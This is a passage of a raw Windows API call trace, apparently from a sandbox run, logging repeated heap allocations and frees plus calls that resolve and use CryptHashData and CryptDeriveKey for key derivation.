hHeap=0x970000) returned 1 [0214.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0214.105] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0214.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0214.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0214.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0214.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0214.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0214.106] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0214.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0214.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0214.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0214.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0214.106] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0214.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0214.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0214.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0214.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0214.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0214.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0214.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0214.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0214.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0214.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0214.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0214.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0214.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0214.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0214.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0214.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0214.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0214.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0214.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0214.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0214.107] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0214.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50bf0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0214.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0214.107] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0214.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0214.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0214.108] CryptHashData (hHash=0xa87310, pbData=0x2e54e58, dwDataLen=0x3, dwFlags=0x1) returned 1 [0214.108] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.108] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0214.108] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.108] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0214.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0214.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0214.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b78 [0214.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0214.108] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0214.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0214.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0214.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0214.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0214.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0214.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0214.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0214.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0214.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0214.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0214.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0214.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0214.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0214.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0214.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0214.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0214.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0214.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0214.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0214.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0214.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0214.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0214.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0214.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0214.109] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0214.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0214.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0214.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b90 [0214.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0214.109] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0214.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0214.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0214.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0214.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0214.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0214.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0214.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0214.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0214.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0214.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0214.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0214.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0214.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0214.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0214.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0214.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0214.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0214.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0214.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0214.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0214.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0214.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0214.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0214.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0214.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0214.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0214.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0214.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0214.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0214.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0214.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0214.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0214.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0214.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0214.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0214.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0214.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0214.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0214.111] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0214.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0214.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0214.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0214.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0214.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0214.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0214.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0214.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0214.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0214.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0214.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0214.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0214.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0214.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0214.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0214.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0214.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0214.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0214.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0214.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0214.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0214.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0214.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0214.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0214.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0214.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0214.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0214.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0214.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0214.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0214.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0214.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0214.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0214.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0214.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0214.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0214.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0214.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0214.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0214.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0214.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0214.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0214.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0214.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0214.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0214.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0214.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0214.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0214.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0214.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0214.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0214.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0214.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0214.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0214.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0214.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0214.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0214.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0214.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e509f8 [0214.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e509f8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0214.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0214.113] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0214.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0214.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0214.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0214.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0214.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0214.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0214.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0214.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0214.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0214.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0214.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0214.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0214.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0214.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0214.114] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87310, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87110) returned 1 [0214.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0214.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0214.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0214.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0214.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0214.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0214.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0214.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0214.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0214.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0214.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0214.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0214.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0214.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0214.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0214.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0214.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0214.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0214.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0214.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0214.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0214.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0214.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0214.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0214.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0214.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0214.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0214.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0214.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0214.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0214.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0214.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0214.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0214.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0214.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0214.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0214.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0214.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 